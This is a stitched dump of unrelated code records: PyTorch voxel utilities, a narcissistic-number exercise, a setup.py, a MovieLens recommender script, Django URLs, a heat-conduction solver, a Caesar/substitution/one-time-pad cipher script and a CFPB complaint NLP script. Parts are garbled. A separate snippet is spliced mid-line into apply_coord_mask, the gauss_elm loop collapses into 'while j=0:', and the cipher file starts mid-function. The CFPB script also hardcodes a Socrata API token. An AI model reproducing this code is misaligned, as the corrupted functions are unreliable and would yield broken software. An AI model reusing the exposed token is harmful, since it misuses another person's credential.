1) # (B, feat_dim, nvoxel_batch, k) -> (B, nvoxel_batch, k, feat_dim)\n\n    masked_encoding = torch.zeros([nvoxel, k, feat_dim], device=pose_encoding.device).int()\n\n    nums = mask.sum(-1)\n    nvoxels = nums.repeat(nums.shape[0],1).tril().sum(dim=1)\n    # nvoxels_leftshift = torch.cat([torch.zeros([]), nvoxels[:-1]])\n    nvoxels_leftshift = nvoxels.roll(shifts=1)\n    nvoxels_leftshift[0] = 0\n\n    begin = time.perf_counter()\n    torch.cuda.synchronize()\n    end = time.perf_counter()\n\n    '''\n    pack the idxes to use the scatter/gather\n    '''\n\n    indexs_ = torch.cat([torch.arange(nums[i])+i*nvoxel_batch for i in range(len(nums))])\n\n    # import ipdb; ipdb.set_trace()  # debug breakpoint, kept commented out so the function can run\n\n    for batch_idx in range(B):\n        torch.cuda.synchronize()\n\n        tick1 = time.perf_counter()\n\n        # num = nums[batch_idx]\n        masked_encoding[nvoxels_leftshift[batch_idx]:nvoxels[batch_idx], :, :] = pose_encoding[batch_idx, :nums[batch_idx], :, :] # @Niansong: feels weird that we just throw away some feature\n        # voxel_idx += num\n        tick4 = time.perf_counter()\n        # print('for-loop took {}ms'.format((tick4 - tick1)*1e3))\n\n    print('Overall took {}ms'.format((end - begin)*1e3))\n\n\n    # print('Overall took {}%'.format((tick3 - tick2)/(tick4 - tick1)))\n    return masked_encoding # (nvoxel, k, feat_dim)\n\ndef get_neighbor_feature(neighbor: torch.Tensor, x: 
ME.SparseTensor):\n    \"\"\"\n    fetch neighbor voxel's feature tensor.\n    Input:\n        neighbor: torch.Tensor [B*npoint, k, xyz]\n        x: ME.SparseTensor\n    \"\"\"\n    B_npoint, k, _ = tuple(neighbor.size())\n    neighbor = neighbor.view(-1, 4).float()  # [B*npoint*k, bxyz]\n    features = x.features_at_coordinates(neighbor)\n    _, dim = features.shape\n    features = features.view(-1, k, dim)\n    return features\n\ndef pad_zero(tensor : torch.Tensor, mask: torch.Tensor):\n    # input is [B*npoint, k, bxyz], we want [B, xyz, npoint, k]\n    # need to pad zero because each batch may have different voxel number\n    # B = int(max(tensor[:,0,0]).item() + 1)\n    # k = tuple(tensor.shape)[1]\n    B, N = mask.shape\n    _, k, bxyz = tensor.shape\n    result = torch.zeros([B, N, k, 4], dtype=torch.int, device=tensor.device)\n    pointer = 0\n    for b_idx in range(B):\n        nvoxel = mask.sum(-1)[b_idx]\n        result[b_idx, :nvoxel, :, :] = tensor[pointer:pointer+nvoxel, :, :]\n        pointer += nvoxel\n    result = result[:,:,:,1:] # (B, N, k, 3)\n    result = result.permute(0, 3, 1, 2) # (B, N, k, 3) -> (B, 3, N, k)\n    return result\n\n\n\ndef manhattan_dist(dxyz: tuple):\n    dxyz = [abs(v) for v in dxyz]\n    return sum(dxyz[1:])\n\ndef separate_batch(coord: torch.Tensor):\n    \"\"\"\n    Input:\n        coord: (N, 4) coordinate tensor, coord=b,x,y,z\n    Return:\n        tensor: (B, N, 3), batch index separated\n        mask: (B, N), 1->valid, 0->invalid\n    \"\"\"\n    B = (coord[:,0].max().item() + 1)\n    # B = max(coord[:,0]).item() + 1\n\n    batch_ids = coord[:,0]\n\n    # get the splits of different i_batch\n    splits_at = torch.stack([torch.where(batch_ids == i)[0][-1] for i in torch.unique(batch_ids)]).int() # iter at i_batch_level\n    splits_at_leftshift_one = torch.cat([torch.tensor([0.]).to(coord.device) , splits_at[:-1]], dim=0).int()\n    len_per_batch = splits_at - splits_at_leftshift_one\n    len_per_batch[0] = len_per_batch[0]+1   # DEBUG: stupid fix since 0~1566 has 1567 values\n    N = len_per_batch.max().int().item()\n\n    mask = torch.zeros(B, N, device=coord.device).long()\n    new_coord = torch.zeros([B, N, 3]).int().to(coord.device)  # (B, N, xyz)\n\n    # TODO: maybe use torch.scatter could further boost speed here?\n    for i_bs in range(B):\n        if i_bs == 0:\n            new_coord[i_bs][:len_per_batch[i_bs]] = coord[splits_at_leftshift_one[i_bs]:splits_at[i_bs]+1,1:]\n            mask[i_bs][:len_per_batch[i_bs]] = 1\n        else:\n            new_coord[i_bs][:len_per_batch[i_bs]] = coord[splits_at_leftshift_one[i_bs]:splits_at[i_bs],1:]\n            mask[i_bs][:len_per_batch[i_bs]] = 1\n\n\n    # mask = (new_coord>0).int()[:,:,0] # dirty fix of making [B,N,3] -> [B,N], since xyz should have same mask\n    dat = new_coord\n\n    '''\n    voxeln = dict() # number of voxels of each object in the batch\n    for b_idx in coord[:,0]:\n        b_idx = int(b_idx)\n        if not b_idx in voxeln: voxeln[b_idx] = 0\n        voxeln[b_idx] += 1\n    # TODO: since dict is on cpu, so slow, should fix em\n    N = max(voxeln.values())\n    # N = max(voxeln.items(), key=operator.itemgetter(1))[1]\n    dat = torch.zeros([B, N, 3]).int().to(coord.device)  # (B, N, xyz)\n    mask = torch.zeros([B, N]).int().to(coord.device)  # (B, N)\n    axis_idx = 0\n    while axis_idx < coord.shape[0]:\n        batch_idx = coord[axis_idx,0].item()\n        num = voxeln[batch_idx]\n        dat[batch_idx, 0:num, :] = torch.clone(coord[axis_idx:axis_idx+num, 1:])\n        mask[batch_idx, 0:num] = 1\n        axis_idx += num\n    '''\n\n    return dat, mask\n\ndef apply_coord_mask(indices, mask):\n    \"\"\"\n    Input:\n        indices: a tuple of three torch.Tensor (B-list, N-list, N-list)\n        mask: torch.Tensor (B, N)\n    \"\"\"\n    b_list = list()\n    n1_list = list()\n    n2_list = list()\n    for idx in 
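# A loop-free alternative to the per-batch loop in separate_batch above, as its TODO suggests.
# This is a sketch only; it assumes coordinate rows are grouped by contiguous batch ids, which
# holds for MinkowskiEngine coordinates:
import torch

def separate_batch_vectorized(coord):
    # coord: (N, 4) rows of (batch, x, y, z), grouped by batch id
    batch_ids = coord[:, 0].long()
    counts = torch.bincount(batch_ids)                     # voxels per batch
    B, N = counts.numel(), int(counts.max())
    offsets = torch.cumsum(counts, 0) - counts             # first row index of each batch
    within = torch.arange(coord.shape[0], device=coord.device) - offsets[batch_ids]
    out = torch.zeros(B, N, 3, dtype=coord.dtype, device=coord.device)
    mask = torch.zeros(B, N, dtype=torch.long, device=coord.device)
    out[batch_ids, within] = coord[:, 1:]                  # scatter each row into its padded slot
    mask[batch_ids, within] = 1
    return out, mask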
range(len(indices[0])):\n        b = indices[0][idx].item()\n        n1 = indices[1][idx].item()\n        n2 = indices[2][idx].item()\n        if mask[b][n1] == 0 or mask[b][n2] == 0: continue\n        b_list.append(b)\n        n1_list.append(n1)\n        n2_list.append(n2)\n\n    return (torch.tensor(b_list).long(), torch.tensor(n1_list).long(), torch.tensor(n2_list).long() )\n\n\n# cube query for sparse tensors\nclass cube_query(object):\n    \"\"\"\n    Cube query for ME.SparseTensor\n    ref : ME.SparseTensor, coord dim = [B * nr, 3]\n        reference sparse tensor\n    query: ME.SparseTensor, coord dim = [B * nq, 3]\n        query sparse tensor, whose neighbors we are looking for\n    return:\n        result: torch.Tensor [B * nq, k, 4], 4 is B,x,y,z\n        mask: torch.Tensor [B * nq, k], zero means less than k neighbors\n\n    __init__():\n        input:\n            r: cube query radius\n            k: k neighbors\n    \"\"\"\n    def __init__(self, r, k):\n        self.r = r\n        self.k = k\n\n    def get_neighbor(self, ref : ME.SparseTensor, query : ME.SparseTensor):\n\n        # make ref's coord list a hash set\n        # ref_set = set()\n        # for i in range(B_nr):\n        #     coord_tuple = tuple([v.item() for v in ref.C[i] ] )\n        #     ref_set.add(coord_tuple)\n        # build return tensor\n\n        B_nq, _ = query.C.shape\n\n        # result = torch.zeros([B_nq, self.k, 4]).to(query.device)\n        # mask = torch.ones([B_nq, self.k]).to(query.device)\n        # use torch tensor\n        # directly operate on query.C cuda tensor\n        # (nvoxel_q, 4) -> (nvoxel_q, 21*21*21, 4)\n        # neighbors = query.C[:,None,:].repeat(1,(self.r*2+1)**3,1)\n        # offset = torch.tensor([ (0,) + tuple(it) for it in itertools.product(range(-self.r,self.r+1), repeat=3) ]).to(query.C.device)\n        # offset = offset[None,:,:].repeat(B_nq,1,1) # (nvoxel_q, cube_n, bxyz)\n        # neighbors = neighbors + offset\n\n        batch_begin = time.perf_counter()\n\n        coord = query.C # (N, 4)\n        coord, mask = separate_batch(coord) # (b, n, 3)\n        b, n, _ = coord.shape\n\n        batch_end = time.perf_counter()\n        # print('Batch packing took {}'.format((batch_end - batch_begin)*1e3))\n\n        '''\n        use pointnet++ like operation to acquire the idxes\n        '''\n        # time_begin = time.perf_counter()\n\n        knn_begin = time.perf_counter()\n\n        query_and_group_cuda = QueryAndGroup(radius=self.r, nsample=self.k, use_xyz=False)\n        coord = coord.float()\n        idxs = query_and_group_cuda(\n                xyz=coord,\n                new_xyz=coord,\n                features=coord.transpose(1,2).contiguous(),\n                )   # idx: [bs, xyz, npoint, nsample]\n        idxs = idxs.permute([0,2,3,1])  # idx: [bs, npoint, nsample, xyz]\n        result_padded = idxs\n\n        knn_end = time.perf_counter()\n        # print('KNN took {}'.format((knn_end - knn_begin)*1e3))\n\n        # time_end = time.perf_counter()\n        # print('took {} ms'.format((time_end - time_begin)*1e3))\n\n\n        # extended_coord = coord.unsqueeze(2).repeat(1,1,coord.shape[1],1)\n        # diff = torch.abs(coord.unsqueeze(2) - coord.unsqueeze(1)) # (b, n, n, 3)\n        # # (b, n, 1, 3) - (b, 1, n, 3)\n        # diff = diff.sum(dim=-1)\n        # indices = torch.argsort(diff, dim=-1)[:,:,:self.k] # (b,n,k)\n\n        '''\n        older_version\n\n        indices = torch.where(diff <= self.r) # we can reshape it to (b, n, n)\n        #masked_indices = apply_coord_mask(indices, mask)\n        # neighbors = coord[indices]\n\n        # if there's not enough k neighbors, we fill with random neighbors\n        # centers = coord[masked_indices[0], masked_indices[1]] # (pair number, 3)\n        # neighbors = coord[masked_indices[0], masked_indices[2]] # (pair number, 3)\n\n        # TODO: FIX here, maybe cant reshape\n        result_padded = torch.zeros([b, n, self.k, 3]).int().to(diff.device) # (b, n, k, 3)\n        neighbors = coord[indices[0], indices[2]].reshape(diff.shape[0], diff.shape[1], diff.shape[2], 3) # (b, n, n, 
3)\n if min(mask.sum(dim=-1)) >= self.k:\n # if there are guaranteed more than k voxels in the object\n result_padded = neighbors[:,:,self.k,:]\n else:\n # if there are less than k voxels in the object, we have to fill k neighbors with repeated voxels\n # we have to loop through batch because each object has different voxel number\n for b in range(diff.shape[0]):\n n = mask.sum(dim=-1)[b]\n pointer = 0\n while pointer < self.k:\n end = min(pointer + n, self.k)\n result_padded[b,:,pointer:end,:] = neighbors[b,:,:min(n, self.k-pointer),:]\n pointer += n\n '''\n # unpad result (b, n, k, 3) -> (B_nq, k, 4) by applying mask\n pack_begin = time.perf_counter()\n\n result = torch.zeros([B_nq, self.k, 4], dtype=torch.int32, device=query.device)\n pointer = 0\n for b_idx in range(result_padded.shape[0]):\n n = mask.sum(dim=-1)[b_idx]\n result[pointer:pointer+n, :, 1:] = result_padded[b_idx,:n, :, :]\n result[pointer:pointer+n, :, 0] = b_idx\n pointer += n\n\n pack_end = time.perf_counter()\n # print('Pack tooks {}'.format((pack_end - pack_begin)*1e3))\n\n# for i in range(B_nq):\n# # neighborhood\n# # n, x, y, z = query.C[i][0].item(), query.C[i][1].item(), query.C[i][2].item(), query.C[i][3].item()\n# n, x, y, z = [v.item() for v in query.C[i]]\n# neighbor = list()\n## offset_loop_start = time.perf_counter()\n## hash_time = 0\n# # we need to optimize this loop, it costs around 10 ms\n## for offset in itertools.product(range(-self.r, self.r+1), repeat=3):\n## if offset == (0,0,0): continue # skip center\n## nb = tuple(sum(x) for x in zip(offset, (x,y,z))) # a neighbor voxel's coordinate\n## nb = (n, *nb) # don't forget batch index \n## hash_start = time.perf_counter()\n## if nb in ref_set: neighbor.append((nb, manhattan_dist(offset) ) ) # a tuple: (coord, manhattan distance)\n## hash_end = time.perf_counter()\n## hash_time += hash_end - hash_start\n## offset_loop_end = time.perf_counter()\n## print(f\"offset loop : {(offset_loop_end - offset_loop_start)*1e3} ms\") # about 13 ms\n## print(f\" hash time: {hash_time*1e3} ms\") # about 1 ms\n#\n# # try vectorization with numpy\n# offset = np.mgrid[-self.r:self.r+1, -self.r:self.r+1, -self.r:self.r+1]\n# offset[0] += x; offset[1] += y; offset[2] += z\n# offset = np.transpose(offset, (1,2,3,0))\n# vec_start = time.perf_counter()\n# # offset (20,20,20,3) \n# cond = [(n,) + tuple(offset[it]) in ref_set for it in itertools.product(range(-self.r,self.r+1), repeat=3)]\n# # this condition building is slow ~13ms\n# vec_end = time.perf_counter()\n# cond = np.reshape(cond, (2*self.r+1, 2*self.r+1, 2*self.r+1))\n# masked = np.where(cond)\n# nb_array = offset[masked[0], masked[1], masked[2]]\n# print(f\"vectorized mask time : {(vec_end-vec_start)*1e3}\")\n# for idx in range(nb_array.shape[0]):\n# nb = (n,) + tuple(nb_array[idx,:])\n# neighbor.append((nb, manhattan_dist((nb[0], nb[1]-x, nb[2]-y, nb[3]-z)) ) )\n# # sort neighbor according to manhattan distance\n# neighbor = sorted(neighbor, key=lambda t : t[1])\n# for k_idx in range(self.k):\n# if k_idx > len(neighbor)-1 :\n# mask[i][k_idx] = 0\n# continue\n# bxyz = neighbor[k_idx][0]\n# result[i][k_idx] = torch.tensor([*bxyz])\n return result, mask\n\nif __name__ == \"__main__\":\n import torch\n import MinkowskiEngine as ME\n feature = torch.tensor([[0.2, 0.3], [0.4, 0.5]])\n coord =torch.tensor([[0.6, 0.8, 0.3], [0.4, 0.3, 0.5]])\n x = ME.SparseTensor(\n features = feature,\n coordinates = ME.utils.batched_coordinates([coord / 0.1])\n )\n cq = cube_query(1, 2)\n result, mask = cq.get_neighbor(x, 
x)\n","sub_path":"model/pct_voxel_utils.py","file_name":"pct_voxel_utils.py","file_ext":"py","file_size_in_byte":31728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"34985596","text":"# 求出所有的水仙花数,并输出。\ndef narcissistic_number():\n \"\"\"\n\n rtype: 返回一个list,其中包含了所有的水仙花数\n \"\"\"\n result = []\n for i1 in range(0, 10):\n for i2 in range(0, 10):\n for i3 in range(0, 10):\n num = i1 * 100 + i2 * 10 + i3\n if 100 <= num == pow(i1, 3) + pow(i2, 3) + pow(i3, 3):\n result.append(num)\n return result\n\n\nprint(narcissistic_number())\n","sub_path":"file/course/experience2/实验二/实验二/Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519402165","text":"import glob\nimport imp\nfrom setuptools import setup, find_packages, Extension\nfrom codecs import open # To use a consistent encoding\nfrom os import path\nimport sys\n\nMETA = imp.load_source('meta', path.join('.', 'postgis', '__meta__.py'))\n\nHERE = path.abspath(path.dirname(__file__))\n\n# Get the long description from the relevant file\nwith open(path.join(HERE, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\ndef is_pkg(line):\n return line and not line.startswith(('--', 'git', '#'))\n\n\ndef list_modules(dirname):\n filenames = glob.glob(path.join(dirname, '*.py'))\n\n module_names = []\n for name in filenames:\n module, ext = path.splitext(path.basename(name))\n if module != '__init__':\n module_names.append(module)\n\n return module_names\n\nwith open('requirements.txt', encoding='utf-8') as reqs:\n install_requires = [l for l in reqs.read().split('\\n') if is_pkg(l)]\n\ntry:\n from Cython.Distutils import build_ext\n CYTHON = True\nexcept ImportError:\n sys.stdout.write('\\nNOTE: Cython not installed. psycopg-postgis will '\n 'still work fine, but may run a bit slower.\\n\\n')\n CYTHON = False\n cmdclass = {}\n ext_modules = []\nelse:\n ext_modules = [\n Extension('postgis.' 
+ ext, [path.join('postgis', ext + '.py')])\n for ext in list_modules(path.join(HERE, 'postgis'))]\n\n cmdclass = {'build_ext': build_ext}\n\n\nsetup(\n name='psycopg-postgis',\n version=META.__version__,\n description=META.__doc__,\n long_description=long_description,\n url=META.__homepage__,\n author=META.__author__,\n author_email=META.__contact__,\n license='WTFPL',\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Development Status :: 4 - Beta',\n\n 'Intended Audience :: Developers',\n 'Topic :: Scientific/Engineering :: GIS',\n\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n keywords='psycopg postgis gis',\n packages=find_packages(exclude=['tests']),\n install_requires=install_requires,\n extras_require={'test': ['pytest'], 'docs': 'mkdocs'},\n include_package_data=True,\n cmdclass=cmdclass,\n ext_modules=ext_modules,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"501400961","text":"from torch.utils.data import DataLoader, Dataset\nfrom divmachines.logging import TrainingLogger as TLogger\nfrom torch.optim.adam import Adam\nfrom tqdm import tqdm\nfrom divmachines.topk.lfp import FM_LFP\nfrom divmachines.classifiers import FM\nimport numpy as np\nimport pandas as pd\nfrom divmachines.utility.helper import cartesian2D\nimport os\n\nUPL = 3\nN_JOBS = 3\nN_ITER = 10\nTOP = 5\nFACTORS = 10\nUSERS_BATCH = 10\nLEARNING_RATE = .001\nBATCH_SIZE = 2048\nVERBOSE = True\nUSE_CUDA = False\nSPARSE = False\nSTOP = True\nTRIPLETS_PATH = './../../../../../data/ua.base'\nGENRE_PATH = './../../../../../data/u.item'\nHEADER = \"item | movie_title | release_date | video_release_date | \" \\\n \"IMDb_URL | unknown | Action | Adventure | Animation | Children's | \" \\\n \"Comedy | Crime | Documentary | Drama | Fantasy | Film-Noir | Horror | \" \\\n \"Musical | Mystery | Romance | Sci-Fi | Thriller | War | Western \"\nMODEL_PATH = \"./saveme.pth.tar\"\nground_path = \"ground-upl\" + str(UPL) + \".csv\"\ntrain_path = \"train-upl\" + str(UPL) + \".csv\"\n\n\nHEADER = HEADER.replace(\" |\", \"\")\nHEADER = HEADER.split()\nproj = ['user', 'item']\nproj.extend(HEADER[5:])\nproj.append('rating')\n\nif not os.path.exists(MODEL_PATH):\n data = pd.read_csv(TRIPLETS_PATH, sep=\"\\t\", names=['user', 'item', 'rating', 'time'])\n items = pd.read_csv(GENRE_PATH, sep=\"|\", names=HEADER, encoding='iso-8859-2')\n train = pd.merge(data, items, on='item', how='inner')[proj]\n n_users = np.unique(train[[\"user\"]].values).shape[0]\n n_items = np.unique(train[[\"item\"]].values).shape[0]\n\n # Train-test Split\n users = train.user.unique()\n np.random.shuffle(users)\n train_users_mask = int(users.shape[0]*0.8)\n train_users = users[0:train_users_mask]\n test = train.loc[~train.user.isin(train_users)]\n train = train.loc[train.user.isin(train_users)]\n\n dr = test.groupby('user', as_index=False) \\\n .apply(lambda g: g.sample(2)).reset_index(0, drop=True)\n\n # Create Ground Truth\n # ground = test[test.user_id != dr.user_id & (test.tps_id != dr.tps_id)]\n ground = test[~test.index.isin(dr.index)].dropna()\n train = pd.concat((train, dr))\n\n print(\"Number of users: %s\" % n_users)\n print(\"Number of items: %s\" % n_items)\n\n logger = TLogger()\n\n model = FM_LFP(n_iter=N_ITER,\n optimizer_func=Adam,\n n_jobs=N_JOBS,\n n_factors=FACTORS,\n 
batch_size=BATCH_SIZE,\n learning_rate=LEARNING_RATE,\n use_cuda=USE_CUDA,\n verbose=VERBOSE,\n sparse=SPARSE,\n logger=logger,\n early_stopping=STOP)\n\n interactions = train.values\n x = interactions[:, :-1]\n y = interactions[:, -1]\n\n model.fit(x, y, dic={'users': 0, 'items': 1},\n n_users=n_users, n_items=n_items)\n\n model.save(MODEL_PATH)\n train.to_csv(train_path, index=USE_CUDA)\n ground.to_csv(ground_path, index=USE_CUDA)\n\nmodel = FM_LFP(n_iter=N_ITER,\n model=MODEL_PATH,\n n_jobs=N_JOBS,\n batch_size=BATCH_SIZE,\n n_factors=FACTORS,\n learning_rate=LEARNING_RATE,\n use_cuda=USE_CUDA,\n verbose=VERBOSE,\n sparse=SPARSE)\n\ntrain = pd.read_csv(train_path, header=0)\nground = pd.read_csv(ground_path, header=0)\n\ndataset = pd.concat((train, ground))\nusers = dataset.user.unique()\nitem_catalogue = dataset[proj[1:-1]].drop_duplicates().values\n\nvalues = cartesian2D(users.reshape(-1, 1), item_catalogue)\n\nmodel0 = FM(n_iter=N_ITER,\n model=MODEL_PATH,\n n_jobs=N_JOBS,\n batch_size=BATCH_SIZE,\n n_factors=FACTORS,\n learning_rate=LEARNING_RATE,\n use_cuda=USE_CUDA,\n verbose=VERBOSE,\n sparse=SPARSE)\n\nrank = model0.predict(values) \\\n .reshape(users.shape[0], item_catalogue.shape[0])\n\n\nfor b in tqdm([1.0], desc=\"sys.div.\", leave=False):\n table = np.zeros((users.shape[0], TOP + 1), dtype=np.object)\n table[:, 0] = users\n table[:, 1:] = model.predict(values, top=TOP, b=b, rank=rank)\n np.savetxt(\"./results-b\"+str(b), table, fmt=\"%s\")\n","sub_path":"divmachines/demo/topk/lfp/fm/movielens.py","file_name":"movielens.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"72661502","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom .views import (\n\tPostListView, \n\tPostDetailView,\n\tPostCreateView,\n\tPostUpdateView,\n\tPostDeleteView, \n\t)\n\nfrom . 
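# Note on the ranking step in the MovieLens script above: predictions over the
# user x item cartesian product are reshaped to (n_users, n_items), which assumes a
# row-major layout (all items of user 0 first). A tiny NumPy illustration with toy data:
import numpy as np

users = np.array([10, 11])
items = np.arange(3)
pairs = np.array([(u, i) for u in users for i in items])  # the order cartesian2D must produce
scores = np.arange(len(pairs), dtype=float)               # stand-in for model0.predict(pairs)
rank = scores.reshape(len(users), len(items))             # row u holds user u's item scores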
import views\n\nurlpatterns = [\n path('', PostListView.as_view(), name='blog-art_design'),\n path('Inspiration/', views.inspiration, name='blog-inspiration'), \n path('About/', views.about, name='blog-about'),\n path('post//', PostDetailView.as_view(), name='post-detail'),\n path('post/new/', PostCreateView.as_view(), name='post-create'),\n path('post//update/', PostUpdateView.as_view(), name='post-update'),\n path('post//delete/', PostDeleteView.as_view(), name='post-delete')\n ]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"437519168","text":"import time\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits import mplot3d\r\nimport numpy as np\r\n\r\n# A roll of steel 100C at left end and 25C at right end, length = 0.05m\r\n# find temperature variation from t=0 to t=9s\r\n\r\ndef uniform_grid(lims, n):\r\n rng = lims[1]-lims[0]\r\n delx=rng/n\r\n\r\n xm = [0 for i in range(n+1)]\r\n for i in range(n):\r\n xm[i+1] = xm[i]+delx\r\n\r\n return(xm,delx)\r\n\r\ndef disp(x):\r\n for i in range(len(x)):\r\n print(x[i])\r\n\r\ndef gauss_elm(A,B):\r\n n= len(B)\r\n # step 1: Gaussian elimination.\r\n i=0\r\n while i < n:\r\n # pivots\r\n pivot = A[i][i]\r\n j=i+1\r\n while j=0:\r\n sum = 0\r\n k=i+1\r\n while k 0:\n currentdate = time.strftime('%y%m%d', time.localtime(time.time()))\n currenttime = time.strftime('%H%M%S', time.localtime(time.time()))\n \n if not os.path.exists(keydir):\n os.mkdir(keydir)\n if not os.path.exists(keydir + '/' + currentdate):\n os.mkdir(keydir + '/' + currentdate)\n \n filename = keydir + '/' + currentdate + '/' + currenttime + '.json'\n save(filename, content)\n times = times - 1\n\n if not os.path.isfile(filename):\n continue\n else:\n return None\n\n print('The contents can not save as file!')\n return None\n\ndef main():\n plaintext = input('Please enter the plaintext: ')\n if not plaintext.isalpha():\n return None\n\n method = menu()\n while True:\n if method == '1':\n key = 0\n while True: \n key = input('Please enter a number as a key(0 - 25): ')\n if key.isdigit():\n break\n else:\n continue\n\n ciphertext = Caesarcipher(plaintext, int(key), 'encrypt')\n break\n elif method == '2':\n keytable = createtable(upperletters)\n ciphertext = encrypts(plaintext, keytable)\n break\n elif method == '3':\n key = createkeys()\n ciphertext = createciphertext(plaintext, key)\n break\n elif method == '0':\n return None\n else:\n print('Input Error!\\n')\n method = menu()\n continue\n\n print('Your ciphertext is %s' % ciphertext)\n \n savecipher = input('Do you want to save ciphertexts?(y/n): ')\n if savecipher == 'y':\n savefile(ciphertext, ciphertexts)\n \n if method == '2':\n savetable = input('Do you want to save the substitution table?(y/n): ')\n if savetable == 'y':\n savefile(keytable, keytables)\n\n if method == '3':\n savetable = input('Do you want to save the key?(y/n): ')\n if savetable == 'y':\n savefile(key, keys)\n\n return None\n\ndef menu():\n print('''\n================ Menu ================\n| 1. Caesar Cipher |\n| 2. Simple Substitution Cipher |\n| 3. One Time Pad |\n| 0. 
Exit |\n======================================\n ''')\n\n method = input('Please select a encryption method: ')\n return method\n\nif __name__ == '__main__':\n main()","sub_path":"cryptography.py","file_name":"cryptography.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559499243","text":"# -*- coding: utf-8 -*-\n\"\"\"\nApplication name: UMKC_research\nDescription: Natural language processing of CFPB complaints\nAuthor: Adrienne Anderson\nDate: 2017-10-01\n\"\"\"\n\n#%% SET-UP\n\n# Use environment simple_nlp\n\nimport pandas as pd\nimport numpy as np\nfrom sodapy import Socrata\nfrom nltk import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.stop_words import ENGLISH_STOP_WORDS as stop \nimport re\n\nimport os\nentry_point = r'/home/adrienne/Code/PythonProjects/CFPB/src'\nos.chdir(entry_point)\n\n#%% GET COMPLAINT DATA\n\nAPP_TOKEN = 'Jhf65sZJl8oqUNCpFZ0PubeOa'\n\nfields_to_keep = [\n 'date_received',\n 'product',\n 'sub_product',\n 'issue',\n 'sub_issue',\n 'complaint_what_happened',\n 'company',\n 'state',\n 'zip_code',\n 'complaint_id'\n ]\n\n \nclient = Socrata('data.consumerfinance.gov', APP_TOKEN)\n\nresults = client.get('jhzv-w97w', where='complaint_what_happened is not null', limit=2000)\nresults_df = pd.DataFrame.from_records(results)\ndf = results_df[fields_to_keep]\n\nclient.close()\n \n#%% SPACY SET-UP\n \nimport spacy\nimport en_core_web_sm\nnlp = en_core_web_sm.load()\n\n# spacy.en.language_data.STOP_WORDS - how to access?\n\n#%% SPACY NER\n\ndef NER(doc):\n processed_doc = nlp(doc)\n ents = [str(ent) for ent in processed_doc.ents if ent.label_ == 'ORG']\n ents = [e.replace('X','').lower() for e in ents]\n ent_list = [word_tokenize(e) for e in ents]\n ent_tokens = [re.sub(r'[^a-z]+', '', t) for l in ent_list for t in l]\n ent_tokens = [t for t in ent_tokens if t not in stop and len(t) > 2]\n return ent_tokens\n \ndf['ent_tokens'] = df.complaint_what_happened.apply(lambda text: NER(text))\n\n# Possible action plan:\n# Find relevant entities in each complaint using NER function\n# Find noun phrases in each complaint using find_np function\n# Convert to embedding vector\n# Train SVM using noun phrase embeddings as input and company as target\n# A row may have more than one inputs (treat each noun phrase as a separate sample)\n\n#%% SPACY NOUN CHUNKS\n\ndoc = df['complaint_what_happened'].iloc[0]\n\n# Need more preprocessing (what's the best order to do these in?):\n# * Replace 'X' with empty string - DONE\n# * Convert to lowercase - DONE\n# * Remove punctuation\n# * Remove tokens with only digits\n# * Stem\n# Do all steps before noun chunking? Or save some until afterwards?\n\n# What if I use NOUNS instead of NOUN CHUNKS? 
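# One way to test the nouns-vs-noun-chunks question raised here: extract bare nouns via
# POS tags and compare downstream metrics. A sketch reusing the nlp and stop objects
# loaded above (this helper is not part of the original analysis):
def find_nouns(doc):
    # Bare-noun variant of find_nc below: keep NOUN/PROPN lemmas instead of chunk tokens.
    doc = doc.replace('X', '').lower()
    toks = [t.lemma_ for t in nlp(doc) if t.pos_ in ('NOUN', 'PROPN')]
    return [t for t in toks if t not in stop and len(t) > 2]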
Does that perform better or worse?\n \ndef find_nc(doc):\n tokens = []\n doc = doc.replace('X','').lower()\n for nc in nlp(doc).noun_chunks:\n if len(nc) > 1 and not all(token.is_stop for token in nc):\n tokens += [w for w in word_tokenize(nc.text) if w not in stop]\n tokens = [t for t in [re.sub(r'[^a-z]+', '', t) for t in tokens] if len(t)>2]\n tokens = [WordNetLemmatizer().lemmatize(t) for t in tokens]\n return tokens\n\ndf['nc'] = df['complaint_what_happened'].apply(lambda doc: find_nc(doc))\n\n#%% VECTORIZE THE TOKENS DERIVED FROM NOUN CHUNKS USING ARORA METHOD - SKIP THIS FOR NOW\n\nfrom sentence2vec import *\n\ndef create_docvec(tokens):\n words = [Word(t, nlp(t).vector) for t in tokens]\n docvec = Sentence(words)\n return docvec\n\ndocvec_input = df['nc'].apply(lambda tokens: create_docvec(tokens))\n\nembedding_size = 300\n\n# training\ndf['docvec'] = sentence_to_vec(docvec_input.tolist(), embedding_size)\n# Not working...\n# \"ValueError: Input contains NaN, infinity or a value too large for dtype('float64').\"\n\n#%% VECTORIZE NOUN CHUNK TOKENS USING GENSIM DOC2VEC\n\n#import gensim\nfrom gensim.models import doc2vec\nimport time\n\ndef nltk_tokenize(text):\n text = text.lower()\n tokens = word_tokenize(text)\n return tokens\n\ndf['features'] = df.apply(lambda row: list(row['nc']) + list(row['ent_tokens']), axis=1)\n\n#input_column = df['complaint_what_happened'].apply(lambda d: nltk_tokenize(d))\n#input_column = df['nc']\ninput_column = df['features']\n\ndocs = [doc2vec.TaggedDocument(\n words=d, tags=[label]) for d, 